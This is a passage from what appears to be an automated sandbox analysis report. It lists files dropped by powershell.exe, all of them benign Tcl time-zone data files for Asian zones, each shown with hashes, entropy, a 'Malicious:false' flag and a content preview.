                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKCXeSDm2OHnBGeoH1mpvyvScHTU71avScr:MB862qXbmdHnBvC1SyHHq8Hr
                                                                                                                                                                                                                              MD5:316DDF860FA234621698EB473E558DB7
                                                                                                                                                                                                                              SHA1:35BF955F764555945CF8B314B8E881DAD6CF557B
                                                                                                                                                                                                                              SHA-256:8BC2E0D77AC35B6D63E11B820AC45EC23A4195ED773680C600C772FDF4B953F8
                                                                                                                                                                                                                              SHA-512:D1A8D5F1DAAB7827BDCBC14506AF8681FD1ED94C6101CC4A3C8CC2A76EA7D3649038069158C539A2007A1B0734FBD87DE120415E07A3F08F44417100C95459F5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dili) {.. {-9223372036854775808 30140 0 LMT}.. {-1830414140 28800 0 +08}.. {-879152400 32400 0 +09}.. {199897200 28800 0 +08}.. {969120000 32400 0 +09}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):148
                                                                                                                                                                                                                              Entropy (8bit):4.97292023820863
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKQUMXGm2OHvkdoHsQK23NVsRYovV:SlSWB9eg/2wKQUDm2OHvsoHxVNSN
                                                                                                                                                                                                                              MD5:861BA4A0A71E6C3F71B90074275FD57C
                                                                                                                                                                                                                              SHA1:BC6FC5233340BB19AE4BD0BA563875479AC0A2B9
                                                                                                                                                                                                                              SHA-256:3DB174F1568BC23BF467A3DC7BAF8A2A2952B70653D4DE54F4DB391EC50B6925
                                                                                                                                                                                                                              SHA-512:B187735E0783F299253D9F93E002AEFF131FCCA50FB3E04CF0545B334B051D5ED978108A47C6957B608F5F93ED4CC3D69751FE0F40413719EE1C0440CD49AC76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dubai) {.. {-9223372036854775808 13272 0 LMT}.. {-1577936472 14400 0 +04}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):820
                                                                                                                                                                                                                              Entropy (8bit):3.969189280047274
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5we3dJvOt81FCuLqecDngO6jPvTpYy5T4TiFGDr:5BvdJqxiF0uGr
                                                                                                                                                                                                                              MD5:9ABD0ECB5F3E738F49CDD1F81C9FF1A4
                                                                                                                                                                                                                              SHA1:46B68C7BBD1BE9791B00128A5129AA3668435C93
                                                                                                                                                                                                                              SHA-256:550DB44595F59D0F151BE4AF70D6FECE20580AB687EF45DE2A0A75FB2515AC80
                                                                                                                                                                                                                              SHA-512:67E2B0EF216D509C4B6DD367519E0A733E54A7CA767D5F7960715E8056E61B7B633C7516D568544F55C9277E90412C1443B822C6EED3341C01F1BD9AA9476FA1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Dushanbe) {.. {-9223372036854775808 16512 0 LMT}.. {-1441168512 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 21600 1 +06}.. {684363600 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7597
                                                                                                                                                                                                                              Entropy (8bit):3.7170041442081203
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:G3pv/7V6Aj8aZaNlK0UpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:G3v/AaaivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:F8E4BA3E260452AE13CF234E60149A62
                                                                                                                                                                                                                              SHA1:8DDB08E2FDEEF6539EE0C0038B166908BFED16CD
                                                                                                                                                                                                                              SHA-256:8CFE85C48FC22033411432F8B75EE4C097A5D84897698CB1AFD5AB51C47FF5A3
                                                                                                                                                                                                                              SHA-512:487177411FB7E9F83AB9AAD84B685322B13A85784D4F90BB9C30F57BFAA6A9298E5C4F36C97444DE1117E51F85A62DC639D08B405460D071C2B29C898553E9A3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Famagusta) {.. {-9223372036854775808 8148 0 LMT}.. {-1518920148 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {622587
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8427
                                                                                                                                                                                                                              Entropy (8bit):3.7494839792487094
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NyHSd2XK1GbJFp3gP0nPVl8dcqU/8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXaP:NyyIgGbJv3dPAD7c1FoMpHu3Ky3p
                                                                                                                                                                                                                              MD5:DEB2D261D6885CD83054391D010DE6AD
                                                                                                                                                                                                                              SHA1:5779B343F4EB2BC75613C593E2FA3A026857F940
                                                                                                                                                                                                                              SHA-256:A1823EDA63434ACF1A37B3A781A783CFEB6BB4CC53ED0469BB685834837F2289
                                                                                                                                                                                                                              SHA-512:D024B2D324D981A6792127551B0D466EAFFC5294C84CB5752A71E5267FB2E9162E7EFAED5A5CA3B06BBAD285F62BF955B0EF86DD39307EE5F935FC601F4EEEFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Gaza) {.. {-9223372036854775808 8272 0 LMT}.. {-2185409872 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-16580
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.86422571961583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKwHp4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKi4wKU
                                                                                                                                                                                                                              MD5:1BCCB3578FADE993EE8B2C11EAC06CD8
                                                                                                                                                                                                                              SHA1:CAEAB714E014CD5040C44E4603708B97BC0B03D4
                                                                                                                                                                                                                              SHA-256:12811A7944B892E3D1C0B4B09057CC1899F28081B3CD47FFD248BA49BA308AF0
                                                                                                                                                                                                                              SHA-512:1D791DC0E8F45359366DF33C2C337688D2E0E972A90F038733B840D28585505AEF542DDBAD014C9EA8C252048A588CD017DD67A84545A81EDB7C17E3B2E65092
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Harbin) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8402
                                                                                                                                                                                                                              Entropy (8bit):3.7520828858184325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:fXSd2XK1GbJFp3gP0nPVl8dcqUZ8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXa4a:fiIgGbJv3dPADPc1FoMpHu3Ky3p
                                                                                                                                                                                                                              MD5:6F176787C7FC5764A63719F0041690BA
                                                                                                                                                                                                                              SHA1:C292A8CEA597D7FD9E2D071AB7AE93E7ABCA21A5
                                                                                                                                                                                                                              SHA-256:732CAA355542C8781C61FC8F5265EBFC59C8CC24E78D01011E1E3256E6B34DC7
                                                                                                                                                                                                                              SHA-512:EE8F39A3D65D75E14B59B4D9CCB27894210CA269E82A7AC7F98BE67764688A8895EBB9C1ACEAB4C1B368B4F1BC5AFCB34E8866CEDFD91232926DF47517096513
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hebron) {.. {-9223372036854775808 8423 0 LMT}.. {-2185410023 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):395
                                                                                                                                                                                                                              Entropy (8bit):4.431055857167822
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862RLmdHneCvhYC5sF/p+zHHviViksF/dMUYPsF/RQ9EsV:5de3vhd5sFR+znv2vsFlM/PsFVsV
                                                                                                                                                                                                                              MD5:A49A3D55C1E10A37125C51F9C6363868
                                                                                                                                                                                                                              SHA1:7C1B5D44643ADC3F02681F6379E82C3F4512F0C1
                                                                                                                                                                                                                              SHA-256:D8A19C70BE5A9AE1E6091DC8FD03D7719110D1F3D78786C91D5BD0949FB5A428
                                                                                                                                                                                                                              SHA-512:804C44E51BB9E93B156B0CB4CB125651003B3C42D65334A052BE149734221315CC75D4FBDE34F62DFC102F1A9C968D1C9B573839C7ECBF7397B61BD90E530B20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ho_Chi_Minh) {.. {-9223372036854775808 25590 0 LMT}.. {-2004073590 25590 0 PLMT}.. {-1851577590 25200 0 +07}.. {-852105600 28800 0 +08}.. {-782643600 32400 0 +09}.. {-767869200 25200 0 +07}.. {-718095600 28800 0 +08}.. {-457776000 25200 0 +07}.. {-315648000 28800 0 +08}.. {171820800 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2226
                                                                                                                                                                                                                              Entropy (8bit):4.0055033036300145
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Ze9l9Pm4yoHtTYJJIX1Zcp6GS0j1SPQpP6gPE8fTZIPNYQGm75st/nQdwi9:DyaoTcwQt6EsQTng
                                                                                                                                                                                                                              MD5:26BCBBA28AE34FE3CF7D17EF4C6B69C8
                                                                                                                                                                                                                              SHA1:5324DEA8E7965C66650E7B4769EFA1297B508486
                                                                                                                                                                                                                              SHA-256:EE9A6997BC1AAD4A8FA95DB312774C3F37FBB895549230C30FC66C02CC170EB6
                                                                                                                                                                                                                              SHA-512:54594CD18838B4A8947EBB5BDE2415727CC127CF79AEC98FC0F5D5A32F68EEAF4E079853239DE9F753CE90F18EFD55AE51FC43D64E313666CEA0EF8AC93BF065
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hong_Kong) {.. {-9223372036854775808 27402 0 LMT}.. {-2056690800 28800 0 HKT}.. {-900910800 32400 1 HKST}.. {-891579600 30600 1 HKWT}.. {-884248200 32400 0 JST}.. {-761209200 28800 0 HKT}.. {-747907200 32400 1 HKST}.. {-728541000 28800 0 HKT}.. {-717049800 32400 1 HKST}.. {-697091400 28800 0 HKT}.. {-683785800 32400 1 HKST}.. {-668061000 28800 0 HKT}.. {-654755400 32400 1 HKST}.. {-636611400 28800 0 HKT}.. {-623305800 32400 1 HKST}.. {-605161800 28800 0 HKT}.. {-591856200 32400 1 HKST}.. {-573712200 28800 0 HKT}.. {-559801800 32400 1 HKST}.. {-541657800 28800 0 HKT}.. {-528352200 32400 1 HKST}.. {-510211800 28800 0 HKT}.. {-498112200 32400 1 HKST}.. {-478762200 28800 0 HKT}.. {-466662600 32400 1 HKST}.. {-446707800 28800 0 HKT}.. {-435213000 32400 1 HKST}.. {-415258200 28800 0 HKT}.. {-403158600 32400 1 HKST}.. {-383808600 28800 0 HKT
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1583
                                                                                                                                                                                                                              Entropy (8bit):3.7521760184466206
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5x3LecCvgsFFFKOksF8FpsF71FQnsFNFxhsFlF6sFaFasFZFisF8GF5sFKLFAZsZ:5FqKVx8Cq9f/y2L
                                                                                                                                                                                                                              MD5:A77140A0D8C2D3E2993E4BA7CADFB4C6
                                                                                                                                                                                                                              SHA1:AE3586264A86D42F578D4B0F7A30C9BE6047EAB1
                                                                                                                                                                                                                              SHA-256:CA88A45E954A9854C680B399E69E4858BF5E861FABFADC19D62D97B734B25415
                                                                                                                                                                                                                              SHA-512:05EA9D903EEC755F799B7C2399ED933245A5AE3A594648FE37AF1CE7699AE499B4ED159F428D91259D80BC9AF5117F2DA055A506AED94E5281C38B7AFF69C6FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hovd) {.. {-9223372036854775808 21996 0 LMT}.. {-2032927596 21600 0 +06}.. {252439200 25200 0 +07}.. {417978000 28800 1 +07}.. {433785600 25200 0 +07}.. {449600400 28800 1 +07}.. {465321600 25200 0 +07}.. {481050000 28800 1 +07}.. {496771200 25200 0 +07}.. {512499600 28800 1 +07}.. {528220800 25200 0 +07}.. {543949200 28800 1 +07}.. {559670400 25200 0 +07}.. {575398800 28800 1 +07}.. {591120000 25200 0 +07}.. {606848400 28800 1 +07}.. {622569600 25200 0 +07}.. {638298000 28800 1 +07}.. {654624000 25200 0 +07}.. {670352400 28800 1 +07}.. {686073600 25200 0 +07}.. {701802000 28800 1 +07}.. {717523200 25200 0 +07}.. {733251600 28800 1 +07}.. {748972800 25200 0 +07}.. {764701200 28800 1 +07}.. {780422400 25200 0 +07}.. {796150800 28800 1 +07}.. {811872000 25200 0 +07}.. {828205200 28800 1 +07}.. {843926400 25200 0 +07}.. {859654800
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2089
                                                                                                                                                                                                                              Entropy (8bit):3.7296034934492694
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5PZy4DdOKStci4KjXoYjoSvfQJWE00dtT43kgiTskNrrBizhzRBqY3M:Py2/svfraBGfgP
                                                                                                                                                                                                                              MD5:C9F7AC464970567E5C38CB01ED2297AE
                                                                                                                                                                                                                              SHA1:453718BACCAE3FACD761AF22CA5875185478ADDD
                                                                                                                                                                                                                              SHA-256:61BAAAD6315FFBDAED6F266880165B06ECCAF72F660B7FB01C8B654F3952D68E
                                                                                                                                                                                                                              SHA-512:72044EFAE262CC12974F2DE2AAF06AC4C31BE73071ACD53DDC6B8D8BFC6FBDF937EC03DC881901F730659BDE662FBCFC76C57B2C086DAA97F160530464FBA7C6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Irkutsk) {.. {-9223372036854775808 25025 0 LMT}.. {-2840165825 25025 0 IMT}.. {-1575874625 25200 0 +07}.. {-1247554800 28800 0 +09}.. {354902400 32400 1 +09}.. {370710000 28800 0 +08}.. {386438400 32400 1 +09}.. {402246000 28800 0 +08}.. {417974400 32400 1 +09}.. {433782000 28800 0 +08}.. {449596800 32400 1 +09}.. {465328800 28800 0 +08}.. {481053600 32400 1 +09}.. {496778400 28800 0 +08}.. {512503200 32400 1 +09}.. {528228000 28800 0 +08}.. {543952800 32400 1 +09}.. {559677600 28800 0 +08}.. {575402400 32400 1 +09}.. {591127200 28800 0 +08}.. {606852000 32400 1 +09}.. {622576800 28800 0 +08}.. {638301600 32400 1 +09}.. {654631200 28800 0 +08}.. {670356000 25200 0 +08}.. {670359600 28800 1 +08}.. {686084400 25200 0 +07}.. {695761200 28800 0 +09}.. {701805600 32400 1 +09}.. {717530400 28800 0 +08}.. {733255200 32400 1 +09}.. {748
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.9013773460609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/2WFK4HB/8QaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/2wK4HJa
                                                                                                                                                                                                                              MD5:8A92C690BE27A69D122BFF51479B7B56
                                                                                                                                                                                                                              SHA1:52DB64587A347F34153A51788BDE8C349D966575
                                                                                                                                                                                                                              SHA-256:1F77C4BD27574E1D2066885DEF01806A02D3E444424A219A8EC5C114F89665E5
                                                                                                                                                                                                                              SHA-512:FEDF57C4862B6792A789F339EB1027EC8A8472B01B7D1D0814C419850B9AC03A7B454FDB04D8BECE166E9A8BCAA58B0B461007A6C824B30B1080991A1DB49CCA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):370
                                                                                                                                                                                                                              Entropy (8bit):4.4733192761103515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKcrJfDm2OHATJeoHMaSYov/YSZkc5q/MVSSFFWSyvScH+dMVSSFL+:MB862EJLmdHjCEdOc5aMxaSyHHaMxF6P
                                                                                                                                                                                                                              MD5:C689A1AA9FFE535AEB3AD3D7EDE55172
                                                                                                                                                                                                                              SHA1:0520FC9A4619FB555A79C5DF2AE82422BF2C5EDA
                                                                                                                                                                                                                              SHA-256:2F39D9F93761B85C254F458317A7DE2B4184BE9459F2193A85C08662E801269A
                                                                                                                                                                                                                              SHA-512:C1034FB2FCFEF201C5362AF21B048B6637A824C5C93D75854CF3807892C772CD4376533E58BFF8D8726F531F43CB231365B8012EBD3C1BECED865D3CD2D6673D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jakarta) {.. {-9223372036854775808 25632 0 LMT}.. {-3231299232 25632 0 BMT}.. {-1451719200 26400 0 +0720}.. {-1172906400 27000 0 +0730}.. {-876641400 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 25200 0 WIB}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):213
                                                                                                                                                                                                                              Entropy (8bit):4.834345288972067
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKcaDm2OHG4YoH1kcfvScHVowkVcr2CV4zvhyov:MB862PmdHNYC6cfHHVop2NVkoov
                                                                                                                                                                                                                              MD5:2CB3A13FCC48F8C4457E001FC309918B
                                                                                                                                                                                                                              SHA1:83174176815CB93D216B5BC532C120EC8AC433CF
                                                                                                                                                                                                                              SHA-256:761C1E80FEBF46D6D6215CEBF211F121974156D9BCE2FB4258C1074C6ED2CE22
                                                                                                                                                                                                                              SHA-512:65009020AB9FEC2F8158A4851A78B71127F9B262DDD1472583942E19B7C086304F54BC8DAE5A40BD1448BCAEDA0FDBACCD19400E10FFA0357E324535F9036EF0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jayapura) {.. {-9223372036854775808 33768 0 LMT}.. {-1172913768 32400 0 +09}.. {-799491600 34200 0 +0930}.. {-189423000 32400 0 WIT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8135
                                                                                                                                                                                                                              Entropy (8bit):3.770028446231146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GKfnxFAEX/nPVl8diAg9oEhH20AHz7LzdWhYbBJPXuVhKaM76Rmg4DLeEcNptv5C:7ffBvPAzF0AHzPzdD1+XBRF0
                                                                                                                                                                                                                              MD5:884227D48C92BA6C519BFE571D4F1037
                                                                                                                                                                                                                              SHA1:21F8977816C2B439686A50D353B836A6D132A946
                                                                                                                                                                                                                              SHA-256:0BDC2C693134199C2ECD374CC01468813DB29DF47422C706A3EA2BE5ECCA177A
                                                                                                                                                                                                                              SHA-512:8A09F1FE11DAD203501A16FE6A2CAEC969FE3553B456B8BD1997E55B3EE430B2BB4B54F7D87C5E99931FD96E7C769CAA618C777EBD23FBD1E1A0F57409422914
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jerusalem) {.. {-9223372036854775808 8454 0 LMT}.. {-2840149254 8440 0 JMT}.. {-1641003640 7200 0 IST}.. {-933638400 10800 1 IDT}.. {-923097600 7200 0 IST}.. {-919036800 10800 1 IDT}.. {-857347200 7200 0 IST}.. {-844300800 10800 1 IDT}.. {-825811200 7200 0 IST}.. {-812678400 10800 1 IDT}.. {-794188800 7200 0 IST}.. {-779846400 10800 1 IDT}.. {-762652800 7200 0 IST}.. {-748310400 10800 1 IDT}.. {-731116800 7200 0 IST}.. {-681955200 14400 1 IDDT}.. {-673228800 10800 1 IDT}.. {-667958400 7200 0 IST}.. {-652320000 10800 1 IDT}.. {-636422400 7200 0 IST}.. {-622080000 10800 1 IDT}.. {-608947200 7200 0 IST}.. {-591840000 10800 1 IDT}.. {-572486400 7200 0 IST}.. {-558576000 10800 1 IDT}.. {-542851200 7200 0 IST}.. {-527731200 10800 1 IDT}.. {-514425600 7200 0 IST}.. {-490838400 10800 1 IDT}.. {-482976000 7200 0 IST}.. {-459388800 10800 1 I
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.8546989169864085
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKTtNMXGm2OHodFxsYoHvgVHURRNVsRYovFFFkdj/cXHF:SlSWB9eg/2wKTPDm2OHoH+YoHvgVHURA
                                                                                                                                                                                                                              MD5:9BD9B21661C235C0794078EC98978D3B
                                                                                                                                                                                                                              SHA1:3D854780F49D0E5F5A190DC9367C7406127C5E4D
                                                                                                                                                                                                                              SHA-256:A59C95C038F2E945D685D96FA9B859CE82A643A1B7F56EB36B2C809DE91CD4BA
                                                                                                                                                                                                                              SHA-512:A76E99CF03DA8897F0A210A98DB79E4CD60070F2BE363D0D0960D9882919F9B49978FA55BB2500F1648ADD4080730CAD85BAFF61D885A9EAD394AC04C850F6BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kabul) {.. {-9223372036854775808 16608 0 LMT}.. {-2524538208 14400 0 +04}.. {-788932800 16200 0 +0430}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2060
                                                                                                                                                                                                                              Entropy (8bit):3.788131608921229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5+SeWI/2kkWk7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5i/2ZsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                              MD5:390F39934F095F89358B73D056D90264
                                                                                                                                                                                                                              SHA1:6B57CE5346B50ED88BFBB6BC57F834FB3F564905
                                                                                                                                                                                                                              SHA-256:6E0278E389072437BC07A5032CD58E9E5B1B2BDB20918632C422EFA97BC43ABF
                                                                                                                                                                                                                              SHA-512:6C54D94E95D73030F2FFCF8D130494CBD79FB1CEB9B59ADE0743C10F02557C3DD59CC6274B262A7E29C2D4C35DDA4B6A9A0398C661F5BD40F3B92181192B9577
                                                                                                                                                                                                                              Malicious:false
